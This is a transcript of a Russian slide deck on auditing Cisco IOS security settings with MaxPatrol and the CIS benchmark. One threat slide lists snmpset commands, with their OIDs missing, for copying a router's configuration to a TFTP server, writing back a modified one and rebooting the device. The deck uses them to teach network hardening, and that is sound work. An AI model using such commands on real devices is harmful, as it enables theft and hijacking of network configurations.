Сканирование Cisco IOS в MaxPatrol Сафронов Илья.

Презентация:



Advertisements
Похожие презентации
Соответствие международным и отраслевым стандартам Технологические аспекты.
Advertisements

Безопасность сетевого доступа. Архитектура Cisco TrustSec. Андрей Гиль ООО «Мобильный сервис»
Группа компаний МАСКОМ Компания Digital Security ТЕМА: Выполнение требований 152 ФЗ и PCI DSS в современных информационных системах - эффект синергии Сергей.
1 / RBBY Внедрение стандарта безопасности данных индустрии платежных карт (PCI DSS) в «Приорбанк» ОАО Минск Ноябрь 2010 «Сражаясь с тем, кто.
Линейка программных продуктов «ЭФРОС» Департамент разработки и испытаний ООО Газинформсервис.
Presentation_ID 1 © 2008 Cisco Systems, Inc. All rights reserved.Cisco Public Внимание, студентам МЭСИ! Институт компьютерных технологий предлагает Вам.
ООО «Газинформсервис» Технологический партнер Ведущий менеджер – руководитель разработки Роздобара Евгений ООО «Газинформсервис»
Несколько слов о безопасности использования мобильных устройств Департамента информатизации Тюменской области Овсянко Андрей.
Проект Aricent - ISS Обзор задачи и требований к кандидатам.
ПРОВЕРЬ СЕБЯ! ПРОВЕРКА.
Лекция 4 Сетевое администрирование. Задачи сетевого администрирования.
Тест на проникновение в соответствии с PCI DSS Илья Медведовский Digital Security Директор, к.т.н.
Aleksey Kvasnikov IS services manager, Russia & CIS Опыт внедрения системы управления информационной безопасностью в ESAB Россия.
Решение задач защиты информации в виртуализированных средах и приведения систем в соответствие с законодательством и мировыми стандартами Круглый стол.
Компания Data Security. Образована в 2007 году дипломированными специалистами, работавшими в крупных фирмах Петербурга Лицензия ФСТЭК на осуществление.
1 Удаленный доступ и виртуальные частные сети. Сетевое администрирование на основе Microsoft Windows Server План лекции Удаленный доступ Виды коммутируемых.
Проверьте себя Назовите число, обратное данному
Андрей Рогов. Документация Ошибки дизайна Ошибки эксплуатации.
© 2007 Cisco Systems, Inc. All rights reserved.SMBE v Cisco SMB University for Engineers Интегрированная система безопасности:
Применение иерархического метода для построения защищенной операционной системы. Выполнила Шилова О. И-411.
Транксрипт:

Сканирование Cisco IOS в MaxPatrol Сафронов Илья

Whats the deal? Безопасность сетевых устройств (Cisco IOS) Стандарты безопасности Контроль за соответствием стандартам безопасности

Cisco security hardening Комплексный подход к безопасности устройств Cisco. Management Plane (управляющий IOSом трафик (SSH, SNMP)) Control Plane (трафик управления сетью (BGP, STP)) Data Plane ( проходящие сквозь устройство данные)

Security benchmarking -CIS Рекомендации и стандарты по безопасности оборудования и ПО.

CIS – Cisco IOS Бенчмарк по безопасности для Cisco IOS

CIS – Cisco IOS Группы проверок: AAA SNMP Global services (CDP, DHCP, HTTP) Logging Neighbor authentication (EIGRP, OSPF, RIP)

Как проверить? Max Patrol

Чего бояться?

Проверка SNMP

Настройки на устройстве

Угроза – Snmpwalk enumeration

Угроза - Копирование файла конфигурации через SNMP TFTP-сервер snmpset -v 1 -c private integer 1 snmpset -v 1 -c private integer 4 snmpset -v 1 -c private integer 1 snmpset -v 1 -c private address. snmpset -v 1 -c private string victim-config snmpset -v 1 -c private integer 1 ///Возврат модифицированного файла конфигурации (startup-config) //обратно на устройство snmpset -v 1 -c private integer 1 snmpset -v 1 -c private integer 1 snmpset -v 1 -c private integer 3 snmpset -v 1 -c private address. snmpset -v 1 -c private string victim-config snmpset -v 1 -c private integer 1 //Перезагрузка устройства для применения изменений

Решение?

Проверка finger

Настройки на устройстве

Угроза – login enumeration

Решение?

Проверка HTTP

Настройки на устройстве

Угроза – кража учетных данных

Решение ?

Проверка CDP

Настройки на устройстве

Угроза - Enumeration через CDP

Решение ?

Аутентификация OSPF

Настройки на устройстве

Угроза – «Отравление» таблиц маршрутизации

Решение?

Кастомный стандарт Не нравится / не подходит стандарт? Собери свой!

Заключение Защищайте свои сетевые устройства Следите за стандартами безопасности Регулярно проводите аудит сети

Конец рассказа Спасибо за внимание Сафронов Илья